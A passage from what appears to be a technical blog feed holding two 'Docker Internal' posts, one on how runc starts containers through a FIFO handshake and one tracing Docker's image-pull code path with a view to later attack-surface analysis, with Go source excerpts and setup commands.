    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">handleFifo</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">initProcess</span><span class="o">.</span><span class="n">pid</span><span class="p">());</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">postStart</span><span class="p">()</span> <span class="c">// run Poststart hook</span>
<span class="p">}</span>
</code></pre></div></div>
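
<p>To make the FIFO handshake concrete, here is a minimal Go sketch. It is not runc's code: the function name <code class="language-plaintext highlighter-rouge">fifoRendezvous()</code>, the temporary path, and the one-byte payload are all assumptions made for illustration. It only demonstrates the underlying mechanism: opening a FIFO write-only blocks until another party opens it for reading.</p>

```go
package main

import (
	"fmt"
	"io"
	"os"
	"path/filepath"
	"sync"
	"syscall"
)

// fifoRendezvous creates a FIFO, parks an "init" goroutine on it, and then
// releases that goroutine the way a "start" command would: by opening the
// FIFO for reading. It returns whatever the init side wrote.
func fifoRendezvous() (string, error) {
	dir, err := os.MkdirTemp("", "fifo-demo")
	if err != nil {
		return "", err
	}
	defer os.RemoveAll(dir)

	path := filepath.Join(dir, "exec.fifo") // hypothetical location
	if err := syscall.Mkfifo(path, 0o622); err != nil {
		return "", err
	}

	var wg sync.WaitGroup
	var initErr error
	wg.Add(1)
	go func() { // stands in for `runc init`
		defer wg.Done()
		// Opening a FIFO write-only blocks until a reader shows up.
		w, err := os.OpenFile(path, os.O_WRONLY, 0)
		if err != nil {
			initErr = err
			return
		}
		defer w.Close()
		_, initErr = w.Write([]byte("0")) // placeholder payload
		// A real init process would now exec the container entrypoint.
	}()

	// Stands in for `runc start`: opening for reading unblocks the writer.
	r, err := os.OpenFile(path, os.O_RDONLY, 0)
	if err != nil {
		return "", err
	}
	defer r.Close()
	data, err := io.ReadAll(r) // returns once the writer closes its end
	wg.Wait()
	if err != nil {
		return "", err
	}
	if initErr != nil {
		return "", initErr
	}
	return string(data), nil
}

func main() {
	got, err := fifoRendezvous()
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("init released, read %q from the FIFO\n", got)
}
```

<p>The point of the design is that neither side needs a signal or a socket: the kernel's blocking <code class="language-plaintext highlighter-rouge">open()</code> on the FIFO is the synchronization primitive.</p>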

<h3 id="24-others">2.4. Others</h3>

<p>If you want to test these behaviors directly with <code class="language-plaintext highlighter-rouge">runc</code>, you can follow the steps below.</p>

<p>First, create a bundle directory to save the root filesystem and <code class="language-plaintext highlighter-rouge">config.json</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir </span>container_bundle
<span class="nb">cd </span>container_bundle
</code></pre></div></div>

<p>Then extract the root filesystem from a docker image into the <code class="language-plaintext highlighter-rouge">rootfs</code> directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker create <span class="nt">--name</span> temp ubuntu:24.04
<span class="nb">mkdir </span>rootfs
docker <span class="nb">export </span>temp | <span class="nb">tar</span> <span class="nt">-C</span> rootfs <span class="nt">-xvf</span> -
docker <span class="nb">rm </span>temp
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">runc</code> “spec” command can generate a default OCI spec <code class="language-plaintext highlighter-rouge">config.json</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>runc spec
</code></pre></div></div>

<p>Modify <code class="language-plaintext highlighter-rouge">config.json</code> to update the entry command.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">{</span>
    "ociVersion": "1.2.1",
    "process": {
        ...
<span class="gd">-       "terminal": true,
</span><span class="gi">+       "terminal": false,
</span>        "args": [
<span class="gd">-           "sh"
</span><span class="gi">+           "/usr/bin/sleep", "3600"
</span>        ]
</code></pre></div></div>

<p>Now you can create a container based on the bundle.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc create <span class="nt">--bundle</span> <span class="nb">.</span> my_container_id
</code></pre></div></div>

<p>List all containers, and you can see that ours is now in the <code class="language-plaintext highlighter-rouge">created</code> state.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc list
ID                PID         STATUS      BUNDLE                  CREATED                          OWNER
my_container_id   63886       created     /tmp/container_bundle   2026-06-04T03:54:00.492598105Z   root
</code></pre></div></div>

<p>If you list the file descriptors of the container's init process, you will find that one of them points to a FIFO file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">ls</span> <span class="nt">-al</span> /proc/63886/fd/
<span class="c"># [...]</span>
l--------- 1 root root 64 Jun  4 11:55 7 -&gt; /run/runc/my_container_id/exec.fifo
<span class="c"># [...]</span>
</code></pre></div></div>

<p>After starting the container, you can see our entry command <code class="language-plaintext highlighter-rouge">sleep 3600</code> is running now!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc start my_container_id

ps aux | <span class="nb">grep sleep
</span>root       64268  0.0  0.0   2704  1688 ?        Ss   12:05   0:00 /usr/bin/sleep 3600
</code></pre></div></div>

<h2 id="3-summary">3. Summary</h2>

<p>This post covers the process of loading a container, including the implementation of <code class="language-plaintext highlighter-rouge">runc</code>. In the next post, I will analyze runtime replacement and the hook interfaces exposed by Docker, using the NVIDIA Toolkit as an example.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In the third post, we’ll discuss how the container is loaded.]]></summary></entry><entry><title type="html">Docker Internal (2)</title><link href="https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2.html" rel="alternate" type="text/html" title="Docker Internal (2)" /><published>2026-06-02T00:00:00+00:00</published><updated>2026-06-02T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2.html"><![CDATA[<p>In the last post, we introduced the relationship between the components in the Docker system, and in this post, we’ll discuss the attack surfaces.</p>

<h2 id="1-pull-an-image">1. Pull an Image</h2>

<p>Imagine you just run <code class="language-plaintext highlighter-rouge">docker pull &lt;image&gt;</code> and get pwned (just an example 😝). The first attack surface is quite straightforward: when you download a <strong>malicious image</strong> published by an attacker, the Docker daemon parses its metadata, extracts the compressed files, and saves them to the filesystem. If any step of this process has a bug or vulnerability, a crafted file may affect data on the host.</p>

<p>In this post, we’ll analyze how Docker pulls an image, parses the metadata, and extracts the files. We’ll also explore potential attack surfaces at the end.</p>

<h3 id="11-setup-environment">1.1. Set Up the Environment</h3>

<p>To understand the image fetching process, we can run a proxy and intercept the HTTP requests between the daemon and the registry server. Here, I use <code class="language-plaintext highlighter-rouge">mitmproxy</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mitmproxy <span class="nt">--listen-host</span> 127.0.0.1 <span class="nt">--listen-port</span> 8080
</code></pre></div></div>

<p>And write the config below to <code class="language-plaintext highlighter-rouge">/etc/systemd/system/docker.service.d/http-proxy.conf</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Service]
Environment="HTTP_PROXY=http://127.0.0.1:8080"
Environment="HTTPS_PROXY=http://127.0.0.1:8080"
</code></pre></div></div>

<p>Then restart the <code class="language-plaintext highlighter-rouge">dockerd</code> daemon to reload the configuration:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>systemctl daemon-reload  <span class="c"># reload config</span>
<span class="nb">sudo </span>systemctl restart docker <span class="c"># restart dockerd</span>
</code></pre></div></div>

<p>After that, you can read the intercepted HTTP requests in mitmproxy’s TUI when you run <code class="language-plaintext highlighter-rouge">docker pull ubuntu:24.04</code>:</p>

<p><img src="/assets/image-20260601000000000.png" alt="image-20260601000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h3 id="12-auth--head-manifest">1.2. Auth &amp; HEAD Manifest</h3>

<p>Run <code class="language-plaintext highlighter-rouge">docker pull ubuntu:24.04</code> and the docker-cli sends the following HTTP request to <code class="language-plaintext highlighter-rouge">dockerd</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/images/create?fromImage=docker.io%2Flibrary%2Fubuntu&amp;tag=24.04
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0
X-Registry-Auth: e30=
</code></pre></div></div>
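
<p>Two details of this request are easy to verify yourself. The Go sketch below (helper names are mine, not Docker's) rebuilds the query string and decodes the <code class="language-plaintext highlighter-rouge">X-Registry-Auth</code> value, which is a base64url-encoded JSON document. Here it decodes to an empty object, meaning no credentials were supplied.</p>

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
)

// pullQuery builds the query string of the /images/create request.
func pullQuery(image, tag string) string {
	q := url.Values{}
	q.Set("fromImage", image)
	q.Set("tag", tag)
	return q.Encode() // keys are emitted in sorted order
}

// decodeRegistryAuth decodes the base64url value of X-Registry-Auth.
func decodeRegistryAuth(header string) (string, error) {
	raw, err := base64.URLEncoding.DecodeString(header)
	if err != nil {
		return "", err
	}
	return string(raw), nil
}

func main() {
	fmt.Println(pullQuery("docker.io/library/ubuntu", "24.04"))

	auth, err := decodeRegistryAuth("e30=")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("decoded auth config: %s\n", auth)
}
```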

<p>The pull image request is handled by the <code class="language-plaintext highlighter-rouge">"/images/create"</code> endpoint of <code class="language-plaintext highlighter-rouge">dockerd</code>, whose handler is <code class="language-plaintext highlighter-rouge">postImagesCreate()</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/image/image.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">ir</span> <span class="o">*</span><span class="n">imageRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">ir</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/images/create"</span><span class="p">,</span> <span class="n">ir</span><span class="o">.</span><span class="n">postImagesCreate</span><span class="p">),</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">pullTag()</code> is called internally, and it creates a resolver object [1] and pulls the target image [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/image/image_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">ir</span> <span class="o">*</span><span class="n">imageRouter</span><span class="p">)</span> <span class="n">postImagesCreate</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">img</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
        <span class="c">// ref = "docker.io/library/ubuntu:24.04" in here</span>
        <span class="n">progressErr</span> <span class="o">=</span> <span class="n">ir</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">PullImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="n">pullOptions</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/containerd/image_pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">PullImage</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">baseRef</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">options</span> <span class="n">imagebackend</span><span class="o">.</span><span class="n">PullOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="o">!</span><span class="n">reference</span><span class="o">.</span><span class="n">IsNameOnly</span><span class="p">(</span><span class="n">baseRef</span><span class="p">)</span> <span class="p">{</span> <span class="c">// "docker.io/library/ubuntu:24.04" has tag "24.04"</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">pullTag</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">baseRef</span><span class="p">,</span> <span class="n">platform</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">MetaHeaders</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">pullTag</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">platform</span> <span class="o">*</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span><span class="p">,</span> <span class="n">metaHeaders</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">][]</span><span class="kt">string</span><span class="p">,</span> <span class="n">authConfig</span> <span class="o">*</span><span class="n">registrytypes</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">out</span> <span class="n">progress</span><span class="o">.</span><span class="n">Output</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resolver</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">i</span><span class="o">.</span><span class="n">newResolverFromAuthConfig</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">authConfig</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="n">metaHeaders</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">opts</span><span class="p">,</span> <span class="n">containerd</span><span class="o">.</span><span class="n">WithResolver</span><span class="p">(</span><span class="n">resolver</span><span class="p">))</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">i</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="o">.</span><span class="n">String</span><span class="p">(),</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The resolver object is allocated and initialized by <code class="language-plaintext highlighter-rouge">newResolverFromAuthConfig()</code>, and eventually a <code class="language-plaintext highlighter-rouge">dockerResolver</code> object is returned [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/containerd/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">newResolverFromAuthConfig</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">authConfig</span> <span class="o">*</span><span class="n">registrytypes</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">ref</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">metaHeaders</span> <span class="n">http</span><span class="o">.</span><span class="n">Header</span><span class="p">)</span> <span class="p">(</span><span class="n">remotes</span><span class="o">.</span><span class="n">Resolver</span><span class="p">,</span> <span class="n">docker</span><span class="o">.</span><span class="n">StatusTracker</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="c">/**
     * i.registryHosts
     * == (daemon/containerd/service.go) config.RegistryHosts
     * == (daemon/daemon.go) d.RegistryHosts
     * == (daemon/hosts.go) func (daemon *Daemon) RegistryHosts(host string)
     */</span>
    <span class="n">hosts</span> <span class="o">:=</span> <span class="n">hostsWrapper</span><span class="p">(</span><span class="n">i</span><span class="o">.</span><span class="n">registryHosts</span><span class="p">,</span> <span class="n">authConfig</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">docker</span><span class="o">.</span><span class="n">NewResolver</span><span class="p">(</span><span class="n">docker</span><span class="o">.</span><span class="n">ResolverOptions</span><span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="n">Hosts</span><span class="o">:</span>   <span class="n">hosts</span><span class="p">,</span> <span class="c">// hosts == a wrapper function of RegistryHosts()</span>
        <span class="n">Tracker</span><span class="o">:</span> <span class="n">tracker</span><span class="p">,</span>
        <span class="n">Headers</span><span class="o">:</span> <span class="n">headers</span><span class="p">,</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="n">NewResolver</span><span class="p">(</span><span class="n">options</span> <span class="n">ResolverOptions</span><span class="p">)</span> <span class="n">remotes</span><span class="o">.</span><span class="n">Resolver</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">dockerResolver</span><span class="p">{</span> <span class="c">// [3]</span>
        <span class="n">hosts</span><span class="o">:</span>         <span class="n">options</span><span class="o">.</span><span class="n">Hosts</span><span class="p">,</span>
        <span class="n">header</span><span class="o">:</span>        <span class="n">options</span><span class="o">.</span><span class="n">Headers</span><span class="p">,</span>
        <span class="n">resolveHeader</span><span class="o">:</span> <span class="n">resolveHeader</span><span class="p">,</span>
        <span class="n">tracker</span><span class="o">:</span>       <span class="n">options</span><span class="o">.</span><span class="n">Tracker</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Pull()</code> calls <code class="language-plaintext highlighter-rouge">c.fetch()</code> to download the target image [4] and then persists the image to <code class="language-plaintext highlighter-rouge">containerd</code>’s image metadata store [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">RemoteOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">Image</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pullCtx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">createNewImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">img</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">fetch()</code> is the key function, and here we only focus on the <code class="language-plaintext highlighter-rouge">rCtx.Resolver.Resolve()</code> call. It takes the <code class="language-plaintext highlighter-rouge">ref</code> as a parameter, which is a string including the <strong>image name</strong> and the <strong>tag</strong> (in our case, <code class="language-plaintext highlighter-rouge">"docker.io/library/ubuntu:24.04"</code>).</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="o">.</span><span class="n">Image</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">name</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">Resolver</span><span class="o">.</span><span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">desc</code> is the <code class="language-plaintext highlighter-rouge">Descriptor</code> object, which describes a media resource. This structure is important because it not only helps you understand the standard for describing a container, but also <strong>contains the information about external resources</strong>, which may be attacker-controllable.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/descriptor.go</span>
<span class="k">type</span> <span class="n">Descriptor</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType"`</span>
    <span class="n">Digest</span> <span class="n">digest</span><span class="o">.</span><span class="n">Digest</span> <span class="s">`json:"digest"`</span>
    <span class="n">Size</span> <span class="kt">int64</span> <span class="s">`json:"size"`</span>
    <span class="n">URLs</span> <span class="p">[]</span><span class="kt">string</span> <span class="s">`json:"urls,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
    <span class="n">Data</span> <span class="p">[]</span><span class="kt">byte</span> <span class="s">`json:"data,omitempty"`</span>
    <span class="n">Platform</span> <span class="o">*</span><span class="n">Platform</span> <span class="s">`json:"platform,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>
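
<p>The <code class="language-plaintext highlighter-rouge">Digest</code> and <code class="language-plaintext highlighter-rouge">Size</code> fields are what let a client check that the content it downloaded is the content the descriptor promised. The Go sketch below illustrates that check with a local, cut-down copy of the struct and a made-up blob. It is my own illustration of the idea, not containerd's verification code.</p>

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// descriptor mirrors only the three fields needed for this example.
type descriptor struct {
	MediaType string `json:"mediaType"`
	Digest    string `json:"digest"`
	Size      int64  `json:"size"`
}

// describe builds a descriptor for a blob, as a registry would advertise it.
func describe(mediaType string, blob []byte) descriptor {
	sum := sha256.Sum256(blob)
	return descriptor{
		MediaType: mediaType,
		Digest:    "sha256:" + hex.EncodeToString(sum[:]),
		Size:      int64(len(blob)),
	}
}

// verify checks that a downloaded blob matches what the descriptor promised.
func verify(d descriptor, blob []byte) error {
	if int64(len(blob)) != d.Size {
		return fmt.Errorf("size mismatch: got %d, want %d", len(blob), d.Size)
	}
	if got := describe(d.MediaType, blob).Digest; got != d.Digest {
		return fmt.Errorf("digest mismatch: got %s, want %s", got, d.Digest)
	}
	return nil
}

func main() {
	blob := []byte(`{"schemaVersion":2}`) // made-up manifest body
	d := describe("application/vnd.oci.image.manifest.v1+json", blob)

	encoded, _ := json.Marshal(d)
	fmt.Println(string(encoded))
	fmt.Println("intact:  ", verify(d, blob))
	fmt.Println("tampered:", verify(d, []byte(`{"schemaVersion":3}`)))
}
```

<p>Note that fields such as <code class="language-plaintext highlighter-rouge">URLs</code> and <code class="language-plaintext highlighter-rouge">Annotations</code> are not covered by this check at all, so they deserve extra attention when the descriptor comes from an untrusted registry.</p>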

<p>How does <code class="language-plaintext highlighter-rouge">Resolve()</code> return a descriptor? It first gets the registry host based on the reference name [6], then decides which built-in paths to use [7]. It then iterates over the paths and hosts, constructing a HEAD request to the remote registry [8] and sending it [9] with a retry mechanism.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">dockerResolver</span><span class="p">)</span> <span class="n">Resolve</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="kt">string</span><span class="p">,</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">/**
     * resolveDockerBase() -&gt; r.base(refspec) -&gt; r.hosts(host) -&gt; RegistryHosts(host)
     * base = { schema: "https", host: "registry-1.docker.io", ... }
     */</span>
    <span class="n">base</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">resolveDockerBase</span><span class="p">(</span><span class="n">ref</span><span class="p">)</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">paths</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">paths</span><span class="p">,</span> <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="s">"manifests"</span><span class="p">,</span> <span class="n">refspec</span><span class="o">.</span><span class="n">Object</span><span class="p">})</span> <span class="c">// [7]</span>
        <span class="n">caps</span> <span class="o">|=</span> <span class="n">HostCapabilityResolve</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">hosts</span> <span class="o">:=</span> <span class="n">base</span><span class="o">.</span><span class="n">filterHosts</span><span class="p">(</span><span class="n">caps</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">u</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">paths</span> <span class="p">{</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">hosts</span> <span class="p">{</span>
            <span class="n">req</span> <span class="o">:=</span> <span class="n">base</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodHead</span><span class="p">,</span> <span class="n">u</span><span class="o">...</span><span class="p">)</span> <span class="c">// [8]</span>
            <span class="c">// [...]</span>
            <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="no">true</span><span class="p">)</span> <span class="c">// [9], HEAD "https://registry-1.docker.io/v2/library/ubuntu/manifests/24.04"</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">doWithRetries()</code> internally calls <code class="language-plaintext highlighter-rouge">r.do()</code>, which tries to send the request [10] and checks whether the request needs to be sent again [11].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">request</span><span class="p">)</span> <span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">,</span> <span class="n">checks</span> <span class="o">...</span><span class="n">doChecks</span><span class="p">)</span> <span class="p">(</span><span class="n">resp</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Response</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
